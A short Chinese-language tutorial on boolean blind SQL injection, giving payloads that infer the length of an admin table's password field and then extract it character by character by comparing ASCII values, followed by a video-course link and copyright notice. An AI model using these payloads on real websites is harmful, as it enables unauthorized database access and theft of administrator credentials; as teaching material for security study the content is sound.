如果頁面沒有顯錯數字,則用盲注語法根據頁面變化來判斷數據內容
獲取數據長度:
and?(select?top?1?len(列名)?from?表名)>5 and?(select?top?1?len(password)?from?admin)>16//錯誤 and?(select?top?1?len(password)?from?admin)>15//正常
獲取指定位數的數據:
and?(select?top?1?asc(mid(列名,位置,1))?from?表名)>97 and?(select?top?1?asc(mid(admin,1,1))?from?admin)>96//判斷admin字段的內容第一位的ascii碼值大于96?正常 and?(select?top?1?asc(mid(admin,1,1))?from?admin)>97//判斷admin字段的內容第一位的ascii碼值大于97?錯誤?說明就是97
?
mid(字符串,截取的位置,截取字符數) asc()?//將字符轉換成ascii碼?方便進行比較
推薦:《mysql視頻教程》
? 版權聲明
文章版權歸作者所有,未經允許請勿轉載。
THE END
